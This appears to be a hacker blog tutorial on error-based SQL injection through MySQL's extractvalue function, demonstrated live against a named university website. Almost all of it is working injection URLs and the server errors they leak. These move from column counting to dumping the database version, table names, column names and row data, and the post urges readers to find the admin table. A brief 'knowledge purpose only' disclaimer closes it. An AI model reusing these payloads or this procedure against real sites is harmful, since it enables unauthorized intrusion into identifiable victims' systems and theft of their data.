Today We Are Going To Learn About Sqli XPATH Injection....
Lets See....
http://bahria.edu.pk/newSite/profile.php?Eid=48'
As U Can See We Have A Site With Sql Error...
Now Find Column Count For This...
Lets Start With Order By 5--+
http://bahria.edu.pk/newSite/profile.php?Eid=48' order by 5--+
Unknown column '5' in 'order clause'
Its Mean Count Is Less Than 5
Try With Order By 4--+
http://bahria.edu.pk/newSite/profile.php?Eid=48' order by 4--+
Unknown column '4' in 'order clause'
Check With Order By 3--+
http://bahria.edu.pk/newSite/profile.php?Eid=48' order by 3--+
Site Is Loading Normally Its Mean Count Is 3..
Lets Find Vulnerable Column With Union Select Statement...
http://bahria.edu.pk/newSite/profile.php?Eid=48' union select 1,2,3--+
When We Put Union Select Statement We Found This Error...
The used SELECT statements have a different number of columns
There Are Several Methods To Bypass It.. But As Our Tutorial Is Regarding XPATH injection So We Will Use XPATH Quries To Bypass It...
Lets Start...
We Are Gonna Find Database Version Nd Database Name....
We Will Execute Following Query...
http://bahria.edu.pk/newSite/profile.php?Eid=48' and extractvalue(0x3a,concat(0x3a,version(),0x3a,database()))--+
XPATH syntax error: ':5.5.37-cll:bahriaed_tahmeed'
Where 5.5.37 Is Mysql DB Version And bahriaed_tahmeed is DB Name...
Now Lets Start Enumertaing Tables...
For Getting Tables We Will Execute Following Query...
http://bahria.edu.pk/newSite/profile.php?Eid=48' and extractvalue(rand(),concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))--+
We Will Use LIMIT Function To Bypass It...
Lets Move On...
http://bahria.edu.pk/newSite/profile.php?Eid=48' and extractvalue(rand(),concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1)))--+
XPATH syntax error: ':box'
Here box Is Table_Name....
We Can Get Other Tables By Using Limit 2,1 Limit 3,1 Limit 4,1 And So On...
Well Now Lets Enumerate Column Name From Table "box"
For This We Will Use Following Query...
Lets C...
http://bahria.edu.pk/newSite/profile.php?Eid=48' and extractvalue(rand(),concat(0x3a,(selec%54 column_name from information_schema.columns where table_name=0x626f78 limit 2,1)))--+
XPATH syntax error: ':title'
Where title Is Column Name.....
Now Lets Find Data From Column "title"
We Will Use Following Query....
http://bahria.edu.pk/newSite/profile.php?Eid=48' and extractvalue(rand(),concat(0x3a,(select title from box limit 1,1)))--+
XPATH syntax error: ':BU Offices'
Where BU Offices Is Data Extracted From Column "title" Of Table "box"...
You Can Find Admin Table And Get Data From It.....
Hope U Guys Enjoyed This Tutorial... For Any Help Or Quries U Can Email Us At "Attackertrojan@gmail.com"
Thanks To My Friend T0olKiT...
NOTE:Dont Harm This Website Or Any Of Website... This Is For Knowledge Perpose Only...
REGARDS: Sh3ll Haxor
0 comments:
Post a Comment